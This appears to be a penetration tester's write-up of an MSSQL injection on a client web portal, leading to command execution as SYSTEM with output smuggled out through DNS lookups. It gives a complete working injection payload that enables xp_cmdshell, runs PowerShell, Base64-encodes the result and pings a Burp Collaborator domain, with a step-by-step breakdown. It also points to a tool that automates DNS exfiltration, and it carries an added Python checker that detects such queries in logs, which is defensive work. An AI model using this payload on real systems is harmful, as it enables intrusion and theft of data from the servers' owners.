In a recent engagement with a client's public infrastructure, I found an error-based MSSQL injection on a web portal which allowed me to execute commands on the internal server machine, running as the highest-privilege user, i.e. nt authority\system. The fun part was retrieving the response of the executed commands through DNS requests, as DNS was the only protocol allowed by the egress rules. I tried getting a response over other network protocols, i.e. HTTP, FTP, SMB and ICMP, but I was only able to receive DNS requests from the target machine on my server.
I used the following command on the target machine. Despite searching many online resources, none of the commands worked for me. So in the end I had to build my own command, as some keywords were causing issues and, moreover, I had to bypass single quotes inside xp_cmdshell too.
Command Executed
vulnParam=xxx';EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; exec master..xp_cmdshell 'powershell $cmd=whoami; $enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); ping -n 1 $enc''.h28348ewbr8323ub38923ui2rb.burpcollaborator.net'' '-- -
Breakdown
EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override;
Enables xp_cmdshell so that commands can be executed on the target machine.
exec master..xp_cmdshell "<Payload>"
Runs the payload through xp_cmdshell.
$cmd=whoami;$enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''='');
Runs the whoami command and converts its output to Base64 (with the '=' padding trimmed), because DNS query names cannot contain arbitrary non-alphanumeric characters.
ping -n 1 $enc''.h28348ewbr8323ub38923ui2rb.burpcollaborator.net''
This makes the target resolve our domain, so the executed command's response arrives inside the DNS request.
Important Note: The quotes used within the xp_cmdshell string are not double quotes but single quotes ('), written twice ('') to escape the single quotes inside the xp_cmdshell string.
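As an added, defender-side example (not part of the original write-up): a small Python checker that applies the encoding described in the breakdown in reverse, scanning DNS query logs for a leftmost label that re-pads and decodes as Base64 text, or that is long and high-entropy. The log line format, timestamps and client addresses are constructed assumptions; the query name reuses the collaborator domain from the payload above.

```python
import base64
import math
import re

# Constructed sample lines in a generic "timestamp client query TYPE qname" shape
# (an assumption; adjust LINE_RE to the real resolver or DNS-server log format).
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 10.0.5.21 query A www.example.com
2024-01-01T10:00:02Z 10.0.5.21 query A bnQgYXV0aG9yaXR5XHN5c3RlbQ.h28348ewbr8323ub38923ui2rb.burpcollaborator.net
2024-01-01T10:00:03Z 10.0.5.22 query A updates.microsoft.com
"""
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")

def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking Base64 labels score well above real hostnames."""
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def decode_label(label: str):
    """Re-add the '=' padding the payload trimmed and return printable UTF-8 text, else None.
    Caveat: a resolver that randomises label case (0x20 encoding) breaks decoding;
    the length/entropy heuristic in find_exfil_candidates still applies then."""
    padded = label + "=" * (-len(label) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text and text.isprintable() else None

def find_exfil_candidates(lines, min_len=16, min_entropy=3.5):
    """Flag queries whose leftmost label decodes as text or looks like encoded data."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        label = m.group("qname").split(".")[0]
        reasons = []
        decoded = decode_label(label)
        if decoded is not None:
            reasons.append("leftmost label decodes to printable text")
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            reasons.append("long high-entropy leftmost label")
        if reasons:
            hits.append({"client": m.group("client"), "qname": m.group("qname"),
                         "decoded": decoded, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in find_exfil_candidates(SAMPLE_LOG.splitlines()):
        print(hit["client"], hit["qname"], "->", hit["decoded"], hit["reasons"])
```

Short labels such as "www" are rejected because their re-padded bytes are not valid UTF-8, so only the query carrying the encoded whoami output is reported.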
Burp Collabfiltrator
Moreover, little did I know at that time that there's an excellent tool out there, known as Collabfiltrator, to exfiltrate blind remote code execution output over DNS via Burp Collaborator. It's available on the BApp store. The working of the tool is simple: you generate a payload with Collabfiltrator for your desired command, which is Base64-encoded, and run the generated payload on your target. The tool takes care of the rest, retrieving the data from the DNS queries. Hats off to the creator.
https://github.com/0xC01DF00D/Collabfiltrator